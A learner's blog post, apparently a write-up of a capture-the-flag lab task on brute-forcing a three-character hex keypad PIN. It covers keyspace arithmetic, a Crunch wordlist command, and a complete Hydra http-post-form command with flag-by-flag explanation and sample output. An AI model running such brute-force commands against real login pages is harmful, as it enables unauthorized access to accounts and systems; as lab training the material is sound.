Post 53 - Open Sesame

03 Dec 2023

Task 9, Day 03, Brute-forcing Hydra is Coming to Town

Counting PIN codes - how many positions for 0-9; 10^x where x= number of digits. Four digits, 10^4 = 10,000 possibilities.

Counting passwords - how many positions for what characters; four character password with 0-9a-zA-Z, 10+26+26 = 62 characters in four possible places, 62^4 = 14,776,336 possibilities. Symbols add another 30 characters, 92^4 = 71,639,296.

How long does it take to brute force?

If trying a password takes 0.001 seconds it would take up to 4 hours for the 14 million combinations. Because of averages where password might be closer to beginning than end, it is safe to assume it would take around 2 hours to crack the password. Increase time taken by adding complexity, include symbols and add to length.

Breaking in

First determine how long the password is. In this case 3 characters. Then figure out what characters are included. In this case, the keypad has hex characters, 0-F. Can use Crunch tool in terminal to generate options.
crunch 3 3 0123456789ABCDEF -o 3digits.txt

• First number is minimum length of password
• Second number is maximum length of password
• 0-F is character set to use
• -o filename.txt saves the output to the specified file.

Can try out codes manually or with a tool like Hydra. In this case, view source of page to see method it uses to login, what address/file is used, and name of variable submitted as the code. This info is needed to set the arguments in Hydra.
hydra -l '' -P filename.txt -f -v TARGET_ADDRESS http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

• -l '' indicates login name is blank since it is only a password
• -P filename.txt specifies password file to use
• -f stops Hydra when password is found
• -v verbose output (as usual)
• Target IP address
• http-post-form specifies method to use
• /login.php page where pin is entered
• pin=^PASS^ replaces ^PASS^ with values from file
• Access denied wrong guesses give access denied page
• -s 8000 port number on target

Failure then success looks similar to:

[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[...]
[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[8000][http-post-form] host: MACHINE_IP   password: [redacted]
[STATUS] attack finished for MACHINE_IP (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-19 17:39:24

The Task

Brute force the code to unlock the door.

Door unlocked, flag retrieved, fun had.

Recommended room

Password Attacks - need to try and remember it.